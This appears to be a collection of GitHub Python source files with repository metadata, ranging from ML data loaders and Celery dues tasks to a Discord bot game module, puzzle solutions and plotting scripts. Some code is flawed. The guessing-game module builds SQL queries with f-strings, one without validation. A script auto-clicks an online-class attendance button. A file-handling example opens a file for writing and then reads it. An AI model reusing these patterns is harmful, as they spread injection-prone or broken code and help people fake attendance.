self.variable_names = cfg['variable_names']\n self.variable_units = cfg['variable_units']\n self.variable_precision = cfg['variable_precision']\n\n atexit.register(self.close)\n\n def update_cfg(self, cfg):\n self.__logger.debug('Update configuration')\n for k in cfg.keys():\n setattr(self, k, cfg[k])\n self.set_filename()\n\n def set_filename(self, timestamp=None):\n suffix = '_' + self.filename_suffix if self.filename_suffix else ''\n if timestamp:\n if not os.path.exists(self.path):\n os.makedirs(self.path)\n self.filename = self.filename_prefix + '_' + strftime('%Y%m%d_%H%M%S', gmtime(timestamp)) + \\\n suffix + '.' + self.FILE_EXT\n suffix_id = 0\n while os.path.exists(os.path.join(self.path, self.filename)):\n self.filename = self.filename_prefix + '_' + strftime('%Y%m%d_%H%M%S', gmtime(timestamp)) + \\\n '_' + str(suffix_id) + suffix + '.' + self.FILE_EXT\n suffix_id += 1\n else:\n self.filename = self.filename_prefix + '__
and and ...\n {r'(p|h\\d)\\s*>\\s*': u'\\n\\n'}, # newline after and and ...\n {r'.*<\\s*(/head|body)[^>]*>': u''}, # remove to \n {r']*>.*': r'\\1'}, # show links instead of texts\n {r'[ \\t]*<[^<]*?/?>': u''}, # remove remaining tags\n {r'^\\s+': u''} # remove spaces at the beginning\n ]\n for rule in rules:\n for (k, v) in rule.items():\n regex = re.compile(k)\n text = regex.sub(v, text)\n text = text.rstrip()\n text = text.strip()\n return text.lower()\n\n\ndef loadData_Tokenizer(DATASET, MAX_NB_WORDS,MAX_SEQUENCE_LENGTH):\n\n # print(path_WOS)\n if DATASET == 1:\n fname = os.path.join(path_WOS,\"WebOfScience/WOS5736/X.txt\")\n fnamek = os.path.join(path_WOS,\"WebOfScience/WOS5736/YL1.txt\")\n fnameL2 = os.path.join(path_WOS,\"WebOfScience/WOS5736/YL2.txt\")\n fnameAll = os.path.join(path_WOS,\"WebOfScience/WOS5736/Y.txt\")\n elif DATASET == 2:\n fname = os.path.join(path_WOS, \"WebOfScience/WOS11967/X.txt\")\n fnamek = os.path.join(path_WOS, \"WebOfScience/WOS11967/YL1.txt\")\n fnameL2 = os.path.join(path_WOS, \"WebOfScience/WOS11967/YL2.txt\")\n fnameAll = os.path.join(path_WOS, \"WebOfScience/WOS11967/Y.txt\")\n else:\n fname = os.path.join(path_WOS, \"WebOfScience/WOS46985/X.txt\")\n fnamek = os.path.join(path_WOS, \"WebOfScience/WOS46985/YL1.txt\")\n fnameL2 = os.path.join(path_WOS, \"WebOfScience/WOS46985/YL2.txt\")\n fnameAll = os.path.join(path_WOS, \"WebOfScience/WOS46985/Y.txt\")\n \n with open(fname) as f:\n content = f.readlines()\n content = [clean_str(x) for x in content]\n content = np.array(content)\n with open(fnamek) as fk:\n contentk = fk.readlines()\n contentk = [x.strip() for x in contentk]\n number_of_classes_L1 = len(set(contentk))\n # print(contentk)\n # print(len(contentk))\n # with open(fnameL2) as fk:\n # contentL2 = fk.readlines()\n # contentL2 = [x.strip() for x in contentL2]\n with open(fnameAll) as fk:\n contentL2 = fk.readlines()\n contentL2 = [x.strip() for x in contentL2]\n # print(len(contentL2))\n\n Label = np.matrix(contentk, dtype=int)\n # number_of_classes_L1 = len(np.unique(Label[0])) # number of classes in Level 1\n Label = np.transpose(Label)\n\n\n Label_L2 = np.matrix(contentL2, dtype=int)\n Label_L2 = np.transpose(Label_L2)\n np.random.seed(7)\n\n Label = np.column_stack((Label, Label_L2))\n\n number_of_classes_L2 = np.zeros(number_of_classes_L1,dtype=int) #number of classes in Level 2 that is 1D array with size of (number of classes in level one,1)\n\n print(type(content[:10]))\n tokenizer = Tokenizer(num_words=MAX_NB_WORDS)\n tokenizer.fit_on_texts(content)\n sequences = tokenizer.texts_to_sequences(content)\n word_index = tokenizer.word_index\n\n print('Found %s unique tokens.' 
% len(word_index))\n\n content = pad_sequences(sequences, maxlen=MAX_SEQUENCE_LENGTH)\n\n indices = np.arange(content.shape[0])\n np.random.shuffle(indices)\n content = content[indices]\n Label = Label[indices]\n print(\"content shape\",content.shape)\n\n X_train, X_test, y_train, y_test = \\\n train_test_split(content, Label, test_size=0.1, random_state=0)\n X_train, X_val, y_train, y_val = \\\n train_test_split(X_train, y_train, test_size=0.1, random_state=0)\n print(\"%d for training, %d for val, %d for testing\"%(len(y_train),len(y_val),len(y_test)))\n\n L2_Train = []\n L2_Val = []\n content_L2_Train = []\n content_L2_Val = []\n L2_class_dict=[]\n '''\n crewate #L1 number of train and test sample for level two \n of Hierarchical Deep Learning models\n '''\n for i in range(0, number_of_classes_L1):\n L2_Train.append([])\n L2_Val.append([])\n content_L2_Train.append([])\n content_L2_Val.append([])\n # L2_class_dict.append({})\n\n X_train = np.array(X_train)\n X_val= np.array(X_val)\n \n for i in range(0, X_train.shape[0]):\n L2_Train[y_train[i, 0]].append(y_train[i, 1])\n content_L2_Train[y_train[i, 0]].append(X_train[i])\n \n # number_of_classes_L2[y_train[i, 0]] = \\\n # max(number_of_classes_L2[y_train[i, 0]], (y_train[i, 1] + 1))\n\n for i in range(0, X_val.shape[0]):\n L2_Val[y_val[i, 0]].append(y_val[i, 1])\n content_L2_Val[y_val[i, 0]].append(X_val[i])\n\n def create_class_dict(y_labels):\n y2i={}\n # this function takes labels in L2 and \n # transform into range (0,max_classes) for train\n unique_labels = set(np.unique(y_labels))\n for i,label in enumerate(unique_labels):\n y2i[label]=i\n return y2i\n \n #transform to np array\n for i in range(0, number_of_classes_L1):\n L2_Train[i] = np.array(L2_Train[i])\n L2_Val[i] = np.array(L2_Val[i])\n content_L2_Train[i] = np.array(content_L2_Train[i])\n content_L2_Val[i] = np.array(content_L2_Val[i])\n #add number of classes for each sub-classifier\n number_of_classes_L2[i] = len(np.unique(L2_Train[i]))\n L2_class_dict.append(create_class_dict(L2_Train[i]))\n # create class_dict for each sub-class\n \n #translate L2 labels by the dict\n for i in range(0, number_of_classes_L1):\n L2_Train[i] = np.array([L2_class_dict[i][y] for y in L2_Train[i]])\n L2_Val[i] = np.array([L2_class_dict[i][y] for y in L2_Val[i]])\n\n embeddings_index = {}\n '''\n For CNN and RNN, we used the text vector-space models using $100$ dimensions as described in Glove. A vector-space model is a mathematical mapping of the word space\n '''\n Glove_path = os.path.join(GLOVE_DIR, 'glove.6B.100d.txt')\n # print(Glove_path)\n f = open(Glove_path, encoding=\"utf8\")\n for line in f:\n values = line.split()\n word = values[0]\n try:\n coefs = np.asarray(values[1:], dtype='float32')\n except:\n print(\"Warnning\"+str(values)+\" in\" + str(line))\n embeddings_index[word] = coefs\n f.close()\n print('Total %s word vectors.' 
% len(embeddings_index))\n return (X_train, y_train, X_val, y_val, X_test, y_test, \n content_L2_Train, L2_Train, content_L2_Val, L2_Val,\n number_of_classes_L2,L2_class_dict,\n word_index,embeddings_index,number_of_classes_L1)\n\n\ndef loadData():\n WOS.download_and_extract()\n fname = os.path.join(path_WOS,\"WebOfScience/WOS5736/X.txt\")\n fnamek = os.path.join(path_WOS,\"WebOfScience/WOS5736/YL1.txt\")\n fnameL2 = os.path.join(path_WOS,\"WebOfScience/WOS5736/YL2.txt\")\n with open(fname) as f:\n content = f.readlines()\n content = [text_cleaner(x) for x in content]\n with open(fnamek) as fk:\n contentk = fk.readlines()\n contentk = [x.strip() for x in contentk]\n with open(fnameL2) as fk:\n contentL2 = fk.readlines()\n contentL2 = [x.strip() for x in contentL2]\n Label = np.matrix(contentk, dtype=int)\n Label = np.transpose(Label)\n number_of_classes_L1 = np.max(Label)+1 # number of classes in Level 1\n\n Label_L2 = np.matrix(contentL2, dtype=int)\n Label_L2 = np.transpose(Label_L2)\n np.random.seed(7)\n print(Label.shape)\n print(Label_L2.shape)\n Label = np.column_stack((Label, Label_L2))\n\n number_of_classes_L2 = np.zeros(number_of_classes_L1,dtype=int)\n\n X_train, X_test, y_train, y_test = train_test_split(content, Label, test_size=0.2,random_state= 0)\n\n vectorizer_x = CountVectorizer()\n X_train = vectorizer_x.fit_transform(X_train).toarray()\n X_test = vectorizer_x.transform(X_test).toarray()\n\n L2_Train = []\n L2_Test = []\n content_L2_Train = []\n content_L2_Test = []\n\n for i in range(0, number_of_classes_L1):\n L2_Train.append([])\n L2_Test.append([])\n content_L2_Train.append([])\n content_L2_Test.append([])\n\n\n for i in range(0, X_train.shape[0]):\n L2_Train[y_train[i, 0]].append(y_train[i, 1])\n number_of_classes_L2[y_train[i, 0]] = max(number_of_classes_L2[y_train[i, 0]],(y_train[i, 1]+1))\n content_L2_Train[y_train[i, 0]].append(X_train[i])\n\n for i in range(0, X_test.shape[0]):\n L2_Test[y_test[i, 0]].append(y_test[i, 1])\n content_L2_Test[y_test[i, 0]].append(X_test[i])\n\n for i in range(0, number_of_classes_L1):\n L2_Train[i] = np.array(L2_Train[i])\n L2_Test[i] = np.array(L2_Test[i])\n content_L2_Train[i] = np.array(content_L2_Train[i])\n content_L2_Test[i] = np.array(content_L2_Test[i])\n return (X_train,y_train,X_test,y_test,content_L2_Train,L2_Train,content_L2_Test,L2_Test,number_of_classes_L2)\n","repo_name":"koustuvsinha/hier-class","sub_path":"Structured-Self-Attentive-Sentence-Embedding/HDLTex/Data_helper.py","file_name":"Data_helper.py","file_ext":"py","file_size_in_byte":10045,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"93"}
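The tokenization step in loadData_Tokenizer follows the standard Keras recipe; stripped to its core it looks like this (the exact import paths differ between standalone keras and tensorflow.keras, so treat them as an assumption):

```python
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences

texts = ["deep learning for text", "hierarchical text classification"]
tokenizer = Tokenizer(num_words=20000)
tokenizer.fit_on_texts(texts)                  # builds the word -> index vocabulary
sequences = tokenizer.texts_to_sequences(texts)
padded = pad_sequences(sequences, maxlen=10)   # pads/truncates to a fixed length
print(padded.shape)                            # (2, 10)
```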
+{"seq_id":"12220102207","text":"from ..Base import Base\nfrom . import u_logger as log\n\n\nclass GuessingGame(Base):\n def __init__(self, *args):\n super().__init__(*args)\n\n async def update_user_guessing_game_score(self, difficulty, user_id, score):\n \"\"\"Update a user's guessing game score.\"\"\"\n try:\n user_scores = self.ex.cache.guessing_game_counter.get(user_id)\n # if the user does not exist, create them in the db & cache\n if not user_scores:\n await self.create_user_in_guessing_game(user_id)\n user_scores = {} # set to default so getting current user score does not error.\n difficulty_score = user_scores.get(difficulty) or 0\n # difficulty score will always exist, no need to have a condition.\n user_scores[difficulty] = difficulty_score + score\n await self.update_user_score_in_db(difficulty, user_scores[difficulty], user_id)\n except Exception as e:\n log.console(f\"{e} (Exception)\", method=self.update_user_guessing_game_score)\n\n async def create_user_in_guessing_game(self, user_id):\n \"\"\"Inserts a user into the guessing game db with no scores. This allows for updating scores easier.\"\"\"\n self.ex.cache.guessing_game_counter[user_id] = {\"easy\": 0, \"medium\": 0, \"hard\": 0}\n return await self.ex.conn.execute(\"INSERT INTO stats.guessinggame(userid) VALUES ($1)\", user_id)\n\n async def update_user_score_in_db(self, difficulty, score, user_id):\n return await self.ex.conn.execute(f\"UPDATE stats.guessinggame SET {difficulty} = $1 WHERE userid = $2\", score,\n user_id)\n\n async def get_guessing_game_top_ten(self, difficulty, members=None):\n \"\"\"Get the top ten of a certain guessing game difficulty\"\"\"\n # make sure it is actually a difficulty in case of s_sql-injection. (condition created in case of future changes)\n if difficulty.lower() not in self.ex.cache.difficulty_levels:\n raise ValueError(\"invalid difficulty given to get_guessing_game_top_ten()\")\n if members:\n return await self.ex.conn.fetch(f\"SELECT userid, {difficulty} FROM stats.guessinggame WHERE {difficulty} \"\n f\"is not null AND userid IN {members} ORDER BY {difficulty} DESC LIMIT 10\")\n return await self.ex.conn.fetch(f\"SELECT userid, {difficulty} FROM stats.guessinggame WHERE {difficulty} \"\n f\"is not null ORDER BY {difficulty} DESC LIMIT 10\")\n\n async def get_user_score(self, difficulty: str, user_id):\n user_scores = self.ex.cache.guessing_game_counter.get(user_id)\n if not user_scores:\n return 0\n difficulty_score = user_scores.get(difficulty) or 0\n return difficulty_score\n\n async def toggle_filter(self, user_id):\n \"\"\"Enables/Disables the group filter for the guessing game on a user.\"\"\"\n user = await self.ex.get_user(user_id)\n user.gg_filter = not user.gg_filter\n if user.gg_filter:\n await self.ex.conn.execute(\"INSERT INTO gg.filterenabled(userid) VALUES ($1)\", user.id)\n else:\n await self.ex.conn.execute(\"DELETE FROM gg.filterenabled WHERE userid = $1\", user.id)\n\n async def filter_auto_add_remove_group(self, user_or_id, group_or_id): # can also pass in a user or group.\n \"\"\"Automatically Add/Remove a group from a user's filtered group list based on the current list.\n\n :returns False if group was removed.\n :returns True if group was added.\n :exception self.ex.exceptions.InvalidParamsPassed if invalid group id.\"\"\"\n\n # check if a user was passed in instead of a user id\n if isinstance(user_or_id, self.ex.u_objects.User):\n user = user_or_id\n else:\n user = await self.ex.get_user(user_or_id)\n\n # check if a group was passed in instead of a 
group id\n if isinstance(group_or_id, self.ex.u_objects.Group):\n group = group_or_id\n else:\n group = await self.ex.u_group_members.get_group(group_or_id)\n\n # raise an exception if we have an invalid group id.\n if not group:\n raise self.ex.exceptions.InvalidParamsPassed(f\"Invalid Group ID ({group_or_id}) was passed in...\")\n\n # add group if not already filtered.\n if group not in user.gg_groups:\n await self.filter_add_group(user, group)\n return True # signifies that a group was added.\n\n # remove group if already filtered.\n else:\n await self.filter_remove_group(user, group)\n return False # signifies that a group was removed.\n\n async def filter_add_group(self, user, group):\n \"\"\"Adds a filtered group to a user.\"\"\"\n user.gg_groups.append(group)\n await self.ex.conn.execute(\"INSERT INTO gg.filteredgroups(userid, groupid) VALUES($1, $2)\",\n user.id, group.id)\n\n async def filter_remove_group(self, user, group):\n \"\"\"Remove a filtered group from a user.\"\"\"\n user.gg_groups.remove(group)\n await self.ex.conn.execute(\"DELETE FROM gg.filteredgroups WHERE userid = $1 AND groupid = $2\",\n user.id, group.id)\n\n\n# self.ex.u_guessinggame = GuessingGame()\n","repo_name":"MujyKun/IreneUtility","sub_path":"IreneUtility/util/u_guessinggame.py","file_name":"u_guessinggame.py","file_ext":"py","file_size_in_byte":5320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
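update_user_guessing_game_score above does a read-modify-write across cache and table; on PostgreSQL (the record uses asyncpg-style conn.execute with $n placeholders) the create-then-update pair could collapse into one upsert. A sketch only — the helper name is mine, it assumes a UNIQUE constraint on userid, and it hard-codes one difficulty column that the real schema may handle differently:

```python
async def upsert_easy_score(conn, user_id: int, score: int) -> None:
    # One round-trip instead of INSERT-then-UPDATE; requires userid UNIQUE.
    await conn.execute(
        "INSERT INTO stats.guessinggame(userid, easy) VALUES ($1, $2) "
        "ON CONFLICT (userid) DO UPDATE "
        "SET easy = stats.guessinggame.easy + EXCLUDED.easy",
        user_id, score,
    )
```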
+{"seq_id":"6057583972","text":"\nfrom celery.utils.log import get_task_logger\nfrom rel8.celery import app\nfrom django.contrib.auth import get_user_model\nfrom Dueapp import models\nfrom celery import shared_task\nfrom account.models import user as user_related_models\nfrom django.db.models import Q\n\nlogger = get_task_logger(__name__)\n\n@app.task()\ndef create_exco_due(due_id,exco_id):\n # users =get_user_model().objects.all().filter(\n # user_type='members',exci__id=exco_id)\n due =models.Due.objects.get(id=due_id)\n excoRole = user_related_models.ExcoRole.objects.get(id=exco_id)\n for member in excoRole.member.all():\n # let set the members that are being Charge it is_financial=False\n models.Due_User.objects.create(\n user =member.user,\n due = due,\n amount=due.amount,\n is_overdue=False\n )\n member.amount_owing = member.amount_owing - due.amount\n member.save()\n\ndef create_membership_due(due_id,membershipgrade_id):\n grade=user_related_models.MemberShipGrade.objects.get(id=membershipgrade_id)\n due = models.Due.objects.get(id=due_id)\n\n for member in grade.member.all():\n models.Due_User.objects.create(\n user =member.user,\n due = due,\n amount=due.amount,\n is_overdue=False\n )\n member.amount_owing = member.amount_owing - due.amount\n member.save()\n\n \n\n@app.task()\ndef create_due_job(due_id,chapterID=None):\n \"\"\"\n this function create general dues\n \"\"\"\n logger.info(f'{due_id},{type(due_id) } from matthew chapterID:{chapterID} ' )\n if chapterID:\n # get all users with the chapterID \n users =get_user_model().objects.all().filter(\n user_type='members',chapter__id=chapterID)\n\n else:\n # else just get all users\n users =get_user_model().objects.all().filter(\n user_type='members',)\n\n due =models.Due.objects.get(id=due_id)\n for eachMember in users:\n # let set the members that are being Charge it is_financial=False\n 'is_for_excos if it false that means we getting all users else if its for only excos'\n member = user_related_models.Memeber.objects.get(user=eachMember,)\n models.Due_User.objects.create(\n user =member.user,\n due = due,\n amount=due.amount,\n is_overdue=False\n )\n member.amount_owing = member.amount_owing - due.amount\n member.save()\n\n# @shared_task\ndef create_deactivating_user_model(id,chapterID=None):\n \"this would create DeactivatingDue for each user so they can pay\"\n # \"\"\"\n # we not nessary creating a new due we just using the info of the due to charge a user\n # \"\"\"\n \n try:\n if chapterID:\n # get all users with the chapterID \n users =get_user_model().objects.all().filter(\n user_type='members',chapter__id=chapterID)\n\n else:\n # else just get all users\n users =get_user_model().objects.all().filter(\n user_type='members',)\n deactivatingDue =models.DeactivatingDue.objects.get(id=id)\n for eachMember in users:\n member = user_related_models.Memeber.objects.get(user=eachMember)\n member.amount_owing=member.amount_owing-deactivatingDue.amount\n member.save()\n \"we are creating\"\n dueUser = models.DeactivatingDue_User.objects.create(\n user = eachMember,\n deactivatingdue=deactivatingDue,\n amount = deactivatingDue.amount\n )\n dueUser.save()\n \n logger.info('Created payment succesffully')\n except models.Due.DoesNotExist:\n logger.info('hello the Due DOes not exist')\n \n@app.task()\ndef deactivate_owing_members(id,chapterID=None):\n 'get all due_users that are meant to pay the Due'\n due = models.Due.objects.get(id=id)\n all_due_user = models.Due_User.objects.all().filter(due=due)\n for each_user in all_due_user:\n if 
each_user.is_paid ==False:\n each_user.is_overdue=True\n each_user.save()\n member = user_related_models.Memeber.objects.get(\n user=each_user.user)\n member.is_financial=False\n member.save()\n\n\n\n\n@app.task()\ndef deactivating_due_job(deactivatingdueID,chapterID=None):\n \"we look for all DeactivatingDue_User that has to do with DeactivatingDue check if they have paid else we going to deactivate that user \"\n all_users_deactivating_dues = models.DeactivatingDue_User.objects.filter(deactivatingdue=deactivatingdueID)\n\n for user_deactivating_due in all_users_deactivating_dues:\n # set the payment to overdue\n if user_deactivating_due.is_paid==False:\n user_deactivating_due.is_overdue=True\n user_deactivating_due.save()\n # deactivate this user\n member = user_related_models.Memeber.objects.get(user=user_deactivating_due.user)\n member.is_financial=False#because it time for payment and the user is owing that why we tag it false\n member.save()\n currentUser = get_user_model().objects.get(id=user_deactivating_due.user.id)\n currentUser.is_active=False\n currentUser.save()","repo_name":"Tomation-Solution/rel8backend","sub_path":"Dueapp/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
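Tasks declared with @app.task() above would normally be fired from a view or a beat schedule; the stock Celery invocation pattern looks like this (the IDs and the 30-day delay are illustrative):

```python
# run immediately on a worker
create_due_job.delay(due_id=42, chapterID=7)

# or schedule the deactivation sweep for when the due expires
deactivate_owing_members.apply_async(args=[42], countdown=30 * 24 * 3600)
```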
+{"seq_id":"24851790755","text":"NY=list(map(int,input().strip().split()))\r\nN=NY[0]\r\nY=NY[1]\r\n\r\ns=False\r\nfor a in range(N+1):\r\n for b in range(a,N+1):\r\n sumN=a*10000+(b-a)*5000+(N-b)*1000\r\n if sumN==Y:\r\n s=True\r\n x=a\r\n y=b-a\r\n z=N-b\r\n if s:\r\n break\r\n\r\nif s==True:\r\n print(\"{} {} {}\".format(x,y,z))\r\nelse:\r\n print(\"-1 -1 -1\")","repo_name":"Kuroboo100/atcoder","sub_path":"abc_85_C.py","file_name":"abc_85_C.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"2481000323","text":"#This file handles the entire background, to include random star generation\nimport pygame\nimport constants as c\nfrom star import Star\nimport random\n\nclass BG(pygame.sprite.Sprite): #inherit from Sprite object from pygame\n def __init__(self):\n super(BG, self).__init__()\n self.image = pygame.Surface(c.DISPLAY_SIZE) #create image for the entire screen size\n self.color = (0, 0, 15)\n self.image.fill(self.color)\n self.rect = self.image.get_rect()\n self.stars = pygame.sprite.Group() #create Sprite group of stars\n self.timer = random.randrange(1, 10)\n\n\n def update(self):\n self.stars.update() #we call the stars update function here\n for star in self.stars:\n if star.rect.y >= c.DISPLAY_HEIGHT:\n self.stars.remove(star)\n if self.timer == 0:\n new_star = Star()\n self.stars.add(new_star) #add new star to group\n self.timer = random.randrange(1, 10)\n self.image.fill(self.color)\n self.stars.draw(self.image)\n self.timer -= 1","repo_name":"lrombado/Galaga_project","sub_path":"background.py","file_name":"background.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"5956117174","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\nimport json\nimport re\nimport base64\nimport urllib.parse\n\nFILENAME = '1-fm.json' # from 'https://www.1.fm/mainstations'\nSTYLESHEET = 'flags.css' # from https://www.1.fm/less/flags.css\nMASK = re.compile(u'\\.bg([^{,]*)\\{background(?:-image)?:url\\(data:image\\/svg\\+xml;base64,([^}]+)\\)\\}')\nOUTPUT = 'backgrounds.css'\nTEMPLATE = '''\\\n.bg-%s { background-image: url(data:image/svg+xml,%s); }\n'''\n\ndef main(args):\n\tstations = None\n\twith open(FILENAME) as f:\n\t\tstations = json.load(f)\n\tstationIds = [s['id'] for s in stations]\n\tprint('|'.join(stationIds))\n\n\tcontent = ''\n\twith open(STYLESHEET) as f:\n\t\tcontent = f.read()\n\tmatches = MASK.findall(content)\n\twith open(OUTPUT, 'w') as out:\n\t\tfor k,v in matches:\n\t\t\tprint(k)\n\t\t\ti = base64.standard_b64decode(v)\n\t\t\tout.write(TEMPLATE % (k, urllib.parse.quote(i)))\n\treturn 0\n\nif __name__ == '__main__':\n\timport sys\n\tsys.exit(main(sys.argv))\n","repo_name":"nadim24/nadim24.github.io","sub_path":"karadio32/plugins/1-fm/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"35544277211","text":"# File operations\n# 2 options\n\n# Option 1:\nf = open(\"file.txt\", \"w\")\ncontent = f.read()\nf.close() # close() method shall be called!!!!\n\n\n# Option 2:\nwith open(\"file.txt\", \"w\") as f:\n content = f.read()\n # some other operations on the file, no need to call close() method\n\n\n\n\n\n\n\n\n\n","repo_name":"erhyilmaz/PythonRepo","sub_path":"PythonSeleniumCourse/course_examples/files/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"}
+{"seq_id":"39067068935","text":"'''\n 特别说明:本人不对使用该程序造成的任何后果负责,建议合理使用本程序\n 该程序签到功能仅在我的电脑实验成功\n 请务必用管理员身份运行,否则无法签到!!!\n XiaoBai Apr 22,2022 \n'''\nimport cv2\nimport pyautogui #自动GUI操作\nimport pyscreeze #屏幕截图\nfrom time import sleep \ncount=0 #签到次数 \ndef sign():\n ####目标图片读取&截屏,路径根据自己需要更改####\n target_button=cv2.imread('C:/pic/button.png', cv2.IMREAD_GRAYSCALE) #设置签到按钮图片,最好用自己电脑截图\n screenshot=pyscreeze.screenshot('C:/pic/screenshot.png')#截图\n target_screenshot=cv2.imread('C:/pic/screenshot.png', cv2.IMREAD_GRAYSCALE)#cv2读入截屏\n ####获取签到按钮照片的宽高#### \n sp=target_button.shape\n button_height=sp[0]\n button_width=sp[1]\n ####图片匹配#####\n result = cv2.matchTemplate(target_screenshot, target_button, cv2.TM_CCOEFF_NORMED)\n mn_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)\n #min_val、max_val都是输入的矩阵中的最小值和最大值\n #min_loc、 max_loc都是最小值 最大值所对应的坐标元组 \n return max_val,max_loc,button_width,button_height\n \nwhile 1: \n max_val,max_loc,button_width,button_height=sign() \n if max_val >= 0.8:\n ####计算签到按钮位置#### \n taget_X=max_loc[0]+int(button_width/2)\n taget_Y=max_loc[1]+int(button_height/2) \n ###鼠标左键点击所计算的目标点#### \n pyautogui.click(taget_X, taget_Y, button='left') \n ####2秒后再次确认签到按钮是否消失####\n sleep(3)\n max_val,max_loc,button_width,button_height=sign() \n if max_val >= 0.8:\n print(\"警告:签到可能失败,请及时确认!\")\n else:\n ####结果输出#####\n count+=1\n print(\"已经完成\",count,\"次签到\")\n sleep(10) #暂停10秒继续执行 可以根据老师签到时间把这个值改高点\n","repo_name":"XiaoBai1103/tengxun_sign","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"}
+{"seq_id":"17550057520","text":"def selection_sort(arr):\n for i in range(len(arr)):\n # Find the minimum element in the unsorted portion of the array\n min_index = i\n for j in range(i+1, len(arr)):\n if arr[j] < arr[min_index]:\n min_index = j\n \n # Swap the minimum element with the first element of the unsorted portion\n arr[i], arr[min_index] = arr[min_index], arr[i]\n\n# Test the function\narr = [5, 2, 8, 1, 9, 3]\nselection_sort(arr)\nprint(arr) # Output: [1, 2, 3, 5, 8, 9]\n","repo_name":"eigenkt/algo","sub_path":"sorting/selectionsort/python/selectionsort.py","file_name":"selectionsort.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"9579808104","text":"def solution(gems):\n gem_len = len(set(gems))\n # print(set(gems))\n answer = []\n cur_have = []\n si, ei = 0, 0\n result = []\n\n while si < len(gems) and ei <= len(gems):\n if len(set(cur_have)) < gem_len:\n if ei == len(gems): break\n cur_have.append(gems[ei])\n ei += 1\n else:\n result.append((si+1,ei,ei-si))\n # print(result)\n cur_have.remove(gems[si])\n si += 1\n\n result = sorted(result, key=lambda x:(x[2],x[0]))\n # print(result)\n\n return [result[0][0],result[0][1]]","repo_name":"sglee487/Coding-test","sub_path":"기타/2020 카카오 인턴십 for Tech developers 문제/3. 보석 쇼핑(효율성 실패2).py","file_name":"3. 보석 쇼핑(효율성 실패2).py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"19656512982","text":"import requests\nimport json\nimport sys\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nfrom scipy.optimize import curve_fit\nfrom matplotlib.ticker import PercentFormatter\nfrom scipy import stats\n# get all\nurl = 'http://localhost:5000/waitingminedtime'\n# url = 'http://localhost:5000/waitingtime'\n# url = 'http://localhost:5000/gasstat'\n\n# get avg\n# url = 'http://localhost:5000/gasavg'\n# url = 'http://localhost:5000/minedavg'\n\nheaders = {'content-type': 'application/json'}\nresponse = requests.get(url, headers=headers)\n# print(response.content)\nresults = json.loads(response.content.decode())\n\nprint('count: ', str(len(results)))\nprint('an example of result:', results[0])\n\n# gas_price of a transaction\nx = []\nx_positive = []\nx_negative = []\n# waiting_time of a transaction\ny = []\ny_positive = []\ny_negative = []\n\nfor row in results:\n gas_price = row['_id']\n time = row['value']\n # if(gas_price <= 50):\n # if(gas_price <= 3) and (time <= 1000):\n if (gas_price >= 0) and (gas_price <= 0.2):\n # if(gas_price <= 10) and (time <= 400):\n # if(gas_price <= float(\"inf\")) and (time <= float(\"inf\")):\n x.append(gas_price)\n y.append(time) \n\n if(time > 0):\n x_positive.append(gas_price)\n y_positive.append(time)\n else:\n x_negative.append(gas_price)\n y_negative.append(time)\n\n\n# get the max of actual cost\nprint('the max gas price is: ', str(max(x)))\nprint('the min gas price is: ', str(min(x)))\nprint('the max time is: ', str(max(y)))\nprint('the min time is: ', str(min(y)))\nprint(len(x))\nprint(len(y))\n\nif(len(x_negative) > 0):\n print('the max gas price is: ', str(max(x_negative)))\n print('the min gas price is: ', str(min(x_negative)))\n\nplt.scatter(x,y,c='g')\nplt.scatter(x_positive,y_positive,c='r')\nplt.scatter(x_negative,y_negative,c='b')\n\n# fig, axs = plt.subplots(1, 3, sharey=True, tight_layout=True)\n# plt.title('Relation between gas price and time')\nplt.xlabel('gas price')\nplt.ylabel('time')\n\n# # Plot original data\n# axs[0].scatter(x, y, c=\"g\")\n# axs[1].scatter(x_positive, y_positive, c=\"r\")\n# axs[2].scatter(x_negative, y_negative, c=\"b\")\n\n\nplt.legend()\nplt.show()\n# # Set ranges of x-axis and y-axis\n# plt.xlim(0,50)\n# # # # plt.xlim(0.2,0.4)\n# plt.ylim(0,500)\n\n\n#\n\n# # matplotlib histogram\n# plt.hist(x, color = 'blue', edgecolor = 'black',\n# bins = int(180/5))\n\n# # seaborn histogram\n# sns.distplot(x, hist=True, kde=False, \n# bins=int(180/5), color = 'blue',\n# hist_kws={'edgecolor':'black'})\n\n# plt.hist(y, weights=np.ones(len(y)) / len(y))\n# plt.gca().yaxis.set_major_formatter(PercentFormatter(1))\n# # Add labels\n# plt.title('Histogram of time')\n# plt.xlabel('time')\n# plt.ylabel('distribution of time')\n# plt.show()\n\n\n# axs[0].hist(x_positive, weights=np.ones(len(y)) / len(y))\n\n# kolmogrove test\n# result = stats.ks_2samp(x_positive,x_negative)\n# print(result)\n# result = stats.ks_2samp(y_positive,y_negative)\n# print(result)\n\n#box plot\n# test = [x_positive, x_negative]\n# plt.boxplot(test)\n# # plt.boxplot(x_positive)\n# # plt.boxplot(x_negative)\n# plt.legend()\n# 